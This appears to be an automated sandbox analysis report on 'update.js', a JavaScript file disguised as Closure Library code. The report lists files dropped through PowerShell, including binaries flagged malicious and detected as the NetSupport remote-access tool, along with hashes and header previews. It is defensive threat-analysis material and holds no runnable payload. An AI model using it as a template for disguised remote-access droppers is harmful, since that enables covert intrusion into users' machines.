                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):328
                            Entropy (8bit):4.93007757242403
                            Encrypted:false
                            SSDEEP:
                            MD5:26E28C01461F7E65C402BDF09923D435
                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                            Malicious:false
                            Reputation:unknown
                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):46
                            Entropy (8bit):4.532048032699691
                            Encrypted:false
                            SSDEEP:
                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                            Malicious:false
                            Reputation:unknown
                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):2.4193819456463714
                            Encrypted:false
                            SSDEEP:
                            MD5:72E3BED9C0F2498AE7F7B8251EB63956
                            SHA1:E9366F86EF5C31D2141FB5D209214D94DD1E24AF
                            SHA-256:96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
                            SHA-512:68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
                            Malicious:false
                            Reputation:unknown
                            Preview:1.0.8.0..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):33144
                            Entropy (8bit):6.7376663312239256
                            Encrypted:false
                            SSDEEP:
                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 3%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):63864
                            Entropy (8bit):6.446503462786185
                            Encrypted:false
                            SSDEEP:
                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................
                            File type:ASCII text, with very long lines (463)
                            Entropy (8bit):5.088465781908519
                            TrID:
                            • Java Script (8502/1) 68.00%
                            • Digital Micrograph Script (4001/1) 32.00%
                            File name:update.js
                            File size:4'058'589 bytes
                            MD5:0d49cb3d2e8bfb9fce01adc2485da2b5
                            SHA1:ce08e5084103407eebec38525dbe36a8403b5465
                            SHA256:d43dbee4487ce35554643d0ceb620f179351a149f74373251e8efd1676604f6f
                            SHA512:e328e6c4ac5c468b1b7698ca94b6fffb831e1f248d23a8c4ce2c55a62c50064893cf97cf4be860fdc49fab4187d549d972299c485227b2d6c0cf6cce25b49147
                            SSDEEP:49152:6sz6FvpOiHY7sz6FvpOiHYXsz6FvpOiHY7sz6FvpOiHYMsz6FvpOiHY7sz6FvpOQ:60WQ0Ws0WQ0Wp0WQ0W5
                            TLSH:8016640879E3988CA523B4795A7FE844B2354117E09EDED1B49CF9F40FA00744A7AE7E
                            File Content Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/..! function(e, f) {. "object2" == typeof exports && "undefined" != typeof module ? f(exports) : "function" == typeof define && define.amd ? define(["exports"], f) : f((
                            Icon Hash:68d69b8bb6aa9a86